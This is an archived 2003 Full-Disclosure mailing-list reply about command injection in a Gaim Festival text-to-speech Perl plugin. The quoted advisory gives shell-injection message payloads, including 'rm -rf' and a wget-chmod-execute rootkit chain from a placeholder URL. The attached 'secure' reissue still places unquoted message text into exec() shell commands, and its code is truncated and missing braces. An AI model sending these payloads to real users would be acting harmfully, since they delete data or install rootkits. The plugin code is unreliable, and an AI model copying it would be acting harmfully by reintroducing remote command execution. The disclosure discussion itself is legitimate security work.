[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-Disclosure] Re: Gaim festival plugin exploit

DUH... would help if I attached my attachment.

I am right proud of myself for this, and it also needs mention to
address the security issue that our friend Error (is that a reference to
Zelda 2?) raised.

Attached, find the latest reissue of the Gaim festival plugin.  The guy
that wrote it, wrote it for pre-0.68 Perl API, but it was secure against
the sort of attack that Error described.  I have since taken it and
recoded it to work with post-0.68 versions of Gaim.  It is attached.  By
all means, if you see an exploitable bug in there, let me know!  I'm
just a perl-tot..


On Wed, 2003-10-15 at 11:29, error wrote:
> It has come to my attention that people have actually used this example
> code for a gaim plugin:
> AIM::register("Festival TTS", "0.0.1", "goodbye", "");
> AIM::print("Perl Says", "Loaded Festival TTS");
> AIM::command("idle", "60000") if ($pro ne "Offline");
> AIM::add_event_handler("event_im_recv", "synthesize");
> sub goodbye {
>       AIM::print("Module Unloaded", "Unloaded Festival TTS");
> }
> sub synthesize {
>     my $string = $_[0];
>     $string =~ s/\<.*?\>//g;
>     $string =~ s/\".*\"//;
>     system("echo \"$string\" | /usr/bin/festival --tts");
> }
> As taken from:
> http://www.webreference.com/perl/tutorial/13/aim_fest_plugin.pl
> This has to be one of the most amusing ways to gain a local users
> privileges I have ever seen by an "Expert (TM)"
> Exploit code?
> You have a shell through gaim with that.
> Just pass it this message (or really any message for that matter):
> Hey, I just wanted to exploit your box, do you mind?"; rm -rf;
> Or perhaps:
> Hey, grab this root kit for me?";wget http://url/to/rootkit;chmod +x
> rootkit;./rootkit
> Perhaps someone should ask:
> "(Is s/[^\w]//g really that hard to do?!)"
> So a fixed version would look like this:
> AIM::register("Festival TTS", "0.0.1", "goodbye", "");
> AIM::print("Perl Says", "Loaded Festival TTS");
> AIM::command("idle", "60000") if ($pro ne "Offline");
> AIM::add_event_handler("event_im_recv", "synthesize");
> sub goodbye {
>       AIM::print("Module Unloaded", "Unloaded Festival TTS");
> }
> sub synthesize {
>     my $string = $_[0];
>     $string =~ s/\<.*?\>//g;
>     $string =~ s/\".*\"//;
>     $string =~ s/[^\w]//g;
>     system("echo \"$string\" | /usr/bin/festival --tts");
> }
> Just a minor comment, nothing special.
HCTITS Security Division <security@humancentrictech.com>
HumanCentric Technologies
# gabfest.pl
# updated by Brian Henning <brian@cheetah.dynip.com>
# License: GPL
# Based upon:
#By:  Matt Davis <agent@sdf.lonestar.org>
#Screen Name:  dasmittel
#License:  GPL
#This is a perl plugin written for GAIM version 0.11
#It will make festival read your incoming messages to you
#after stripping out any html tags that the windows clients send
#The fork allows the message to be displayed as it is being said.  If
#system was used, the message would not display until after festival was
#done saying it.

use Gaim;

        perl_api_version => 2,
        name             => "GabFest",
        version          => "0.5",
        summary          => "Uses Festival to read incoming instant messages",
        description      => "There's nothing more to say about this plugin.",
        author           => "Matt Davis, recoded by Brian Henning",
        url              => "",
        load             => "plugin_load",
        unload           => "plugin_unload"

sub plugin_init {
        return %PLUGIN_INFO;

sub plugin_load {
        $plugin = shift;
        Gaim::signal_connect(Gaim::Conversations::handle, "received-im-msg", 
$plugin, \&festival_say, 0);
#       Gaim::signal_connect($plugin, Gaim::Conversation, "received-im-msg", 
        unless(fork){exec("echo Gabfest has loaded | artsdsp festival -b 
        Gaim::print("Meaningless Drivel", "The damn thing is loaded, not that 
it does any good.");

sub plugin_unload {
        $plugin = shift;
        Gaim::print("GabFest", "GabFest has unloaded.");

sub festival_say {

  my ($gc, $sendername, $message, $flags) = @_;
  $_ = $message;
  s/<(?:[^>\'\"]*|([\'\"]).*?\1)*>//gs;  #Parse out most HTML.  See note 1.
  s/\'//g;  #These lines remove characters that cannot be sent to festival
  s/\"//g;  #  via the command line
  $message = $_;
  if ($message ne ""){
    unless (fork){
     exec("echo $sendername said, $message | artsdsp festival -b --tts");}
  } else {
    system("echo The function was called, but there was apparently nothing to 
say | artsdsp festival -b --tts");
  return 0;  

#--- Note 1.  This section was taken from the URL below
#--- Thanks guys.